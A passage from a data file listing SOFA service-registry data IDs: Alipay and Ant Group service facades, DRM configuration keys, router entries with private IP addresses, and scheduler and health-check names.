0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.pcardsales.pcardSettleDataSourceNew.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.134.6#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iopencore.common.service.manager.ProxyDTOManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:forexprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordermng.common.service.api.order.OrderArQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.TempalteServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.speech.banner.SceneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.selfopact.SelfOpActOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rockcode.facade.EngineControlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.NearDataTairRouterSwitcher.mgetRouterSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insendorseprod.common.service.inst.InsEndorsementInstSurrenderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.YqAlarmLevelDrm.caseAmountLevelHigh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.contentlib.common.service.facade.payment.PaymentOrderUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.QuickClaimFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.DonateSysParamFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mychain.gov.common.facade.tdm.api.TdmInstitutionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.custrelationCzoneTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbcif.neardata.query.api.SiteAccResourceQueryClientService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbretailprod.common.facade.shop.mall.MallShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanpromo.service.BenefitQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.uniresultpage.UniResultPageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:finriskmngcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.UniqueKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custcenter.service.facade.lifecycle.zhima.ZmMerchantManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.acquirecenter.service.facade.api.OrderCloseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.globalTimeout,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.psKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifcommon.business.platform.useragreement.facade.UserAgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.fraudmng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.gotone.common.service.api.UserVendorService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bipgw.common.service.facade.prod.ProdCheckServices:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:abnclprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isasp.service.facade.psbp.InsuranceCityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:payeeAccountRiskValidator@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mwalletmng.common.service.facade.baas.publish.ClientPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:finfocore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.yqdataservice.common.service.facade.po.PoAlarmDataOutputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.meshyorg.com.service.integration.fcmif.FrontCategoryQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.124.169.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.239.237.212#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-wealthkingtwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:morderprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.activity.facade.assets.AssetsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discountcore.common.service.facade.DiscountUnionPayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acfeeweb.common.service.facade.ProductBillingCoreFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.insproductcore.facade.service.InsFcCoverageBackflowFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.auth.api.WhiteListTairManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetSPUQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.contract.FinsContractOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.92.22#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.ParmClientMonitorConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.client.gbase.impl.GeaBaseControlResourceImpl.useDefaultSwift,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cifin:name=com.alipay.cif.client.drm.bankcardtaircache.CifQueryLocalCacheSwitcher.shadowKeySwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_B_DCHAIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mcomment.common.service.facade.comment.CommentUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.resource.PcreditFreeCardTemplateDrm.hbfqAlipassId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.170.12#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.eindustrycenter.common.service.facade.EindustryAbilityCodeConfQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.betacompare.common.facade.api.BetaInvokeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapitool.facade.ugw.UnifygwServiceManageFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.240.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.secucommunity.common.service.facade.subscribe.api.CrowdRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.platform.schedule.concurrent.load.DataLoadDriver:1.0:reservecenterDataLoadDriver@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fporgassetnet#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.cashiercore.service.facade.spi.CashierCoreBizCallbackService:1.0:lendpofprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bksettlemng_largeExceptionAccount@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofademo.point.SecondTccPointAction:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_POINTPROD_CACHE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zpipe.zqueue:qaZQueue48:twolevel1#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pamir.coreclient.attr.AttrProviderService:1.0:appstore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.ssu.SsuConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataSourceCalcService:1.0:publicDomain_securitydata@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbomp.biz.element.deliver.service.LabelManageServiceOnlyTest:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.127#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.paramcore.common.service.manage.facade.api.internal.ParmCacheClientWrapperFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.zpaas.zappinfo.facade.query.MultiContainerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finsnsbff:name=com.alipay.finsnsbff.spring.springTwentyActivityTaskId,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.graycore.biz.check.spi.DetectService:1.0:demo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.policysearch.api.PolicySupportServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.clearingcenter.facade.api.ClearingLogRegisterRecoveryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenEntityGwManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.riskctrl.common.service.mng.HotKeyManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:CREDITGOVERNANCE_ZHIMAGO_TEMPLATE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insautobff:name=com.alipay.rdsguard.drm.RdsSystemSwitchDrmResource.intercepts,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.abilitycore.common.service.facade.solution.SceneProjectConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.contact.facade.MailContactSendService:1.0.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.uniquegoods.UniqueGoodsApplyOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.disableMandatoryLabels,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bioperation.service.facade.api.QuestionDiagnosisFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.sasYebReduceBalanceTimeoutMinutes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:resmng-transferMsgPMCCallbackApplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.166.238.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findefencecore.common.service.accm.facade.AccmOpsCloudCheckRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.circle.api.BusinessCircleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.ficc.goldb2c.api.BackendTransMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.82.87.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-tinygoalkoi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.OrderOperateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:admgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.Fund07FileDisposeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.container.facade.api.KgopenOperationFacade:1.0:kgopenfortune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.prodcore.service.api.rate.VerifyStandardRateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:pcloanpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.IaaSAuthServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilecashier.service.facade.CreateAndPayCallBackFacade:1.0:ebppprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.eventCheckLoadTestStop,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxprod.common.service.facade.api.theme.ThemeMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-ANTASSISTANT-HOME-TASK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acticketcore.common.service.facade.ProductCategoriesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.241.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA-SCHEDULER-S-S-EBPPCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:frscenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocore.common.manager.facade.CampPrizeInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baoxiandataproc.common.service.api.DailyFileConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.allin.facade.KbSpuApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","alphaq@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.pdcore.common.service.facade.SearchDataSyncRecoveryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.goldetfprod.common.service.facade.api.GoldOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinvest.facade.api.during.InvestPaymentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.204.69#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.bumng:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unifiedlimit.facade.UnifiedLimitCheckFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frservcenter.facade.api.process.BPProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finrtcalcenter.common.service.facade.dfinsight.analyse.AnalyseAutomaticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.common.service.facade.activity.ActivityInteractFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iliquidity.biz.manager.mng.QuotaManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dmirror:name=com.alipay.routeclient.DefaultRouteCoordinator.idcDomainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tair.ClusterLockFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finsign.common.service.facade.unioncard.service.FinsignUnionCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.security.facade.ContentSecurityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@inshealthclaimmng#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.cloudinc:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.codprod.common.service.facade.logistics.facade.FamilyExpressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.KeplerDataviewService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.shared.cumulative.CumulativeQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-Revcore-uncertify#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.inshealthcore.common.service.facade.api.asset.HealthAssetUseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:tscentermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.facade.traffic.TrafficFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mmtcaftscmdproc.biz.service.tr.InnerRedirectService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_MSGSEND#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finvirtualta.core.service.yeb.manager.UserBalanceManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.home.rpc.facade.CommonFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.oasis.common.service.facade.cluster.manager.ForClusterManagerTrService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.PcreditInstallmentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:merchantPidPunishAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insapportion.apportion.service.PeriodService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:newLifemngChargeoffInstAccountCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.ProcessTaskCallback:1.0:paymentmng-dbackSlipCallBackManageFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.ValidateRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.PasswordNotifyService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.finriskeventseek.common.service.integration.staragent.KmiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-omegapro@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.47.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ROPCN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.selfoptmng.facade.operation.appinfo.AppInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmcserviceop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.27.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.sla.disaster.drm.SlaDisasterRuleConfigDrm.limitConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.mybank.bkdepbuss.common.facade.CashAccountMaintenanceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.itransfercenter.service.facade.api.TransferQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promocenter_cmpPlanAuditCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acoffercenter.common.service.facade.metadata.RegionManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pushcore.push.TremendousPushFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secperfcap.common.service.facade.service.PerfRiskConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbatch.biz.service.test.OfflineTestFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.custprod.service.api.BindLoanAlipayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pccmc.common.service.facade.service.CmcPledgeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quotstore.common.manage.facade.api.DataApiContentFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.facade.service.visual.VisualModelManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promohelix.common.service.facade.api.sci.SciTaskGroupOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acxbosscore.common.service.facade.RechargeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.173.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.BillDownloadResource.paymentDetailSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.ryb.drm.RYBParamDrmManager.rybFundConfrimFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_S_PROMO#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.wanxiang.client.sofa.config.http-service-addr-info#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.mwalletmng:name=com.alipay.routeclient.DefaultRouteCoordinator.rpcRouteByGroupWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchpunish.facade.approvalEvent.QualificationApprovalEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.common.service.facade.mng.ThirdPartyChannelService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_O_ITECHRISK#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.zdataquery.common.service.facade.BizOrderRefundQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.shared.support.drm.InvalidVoucherTemplateDrm.freezeTemplateIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.150.188#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.ipay.mohelper.common.service.facade.TransferProdService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialportal.web.market.rpc.facade.ServiceMarketFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.product.service.FeaturedWellChosedProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductNoRuleQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.gotone.common.service.api.SendMpaasPushService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.phaseQueryJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:polaristwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.iholoxmng:name=com.alipay.holoxlib.common.tair.impl.HoloxTairResource.strMGetLengthMax,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.antinvest.api.facade.HsTaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.paymentmng.service.facade.paycore.PmtOtherCfgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.cif.client.drm.ClientLogControlDrmSwitch.cifin.logControlDrmSwitch,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:securitydatacbackend@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.31.196#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lifemng.facade.ArriveTimeConfigFacade:1.0@DEF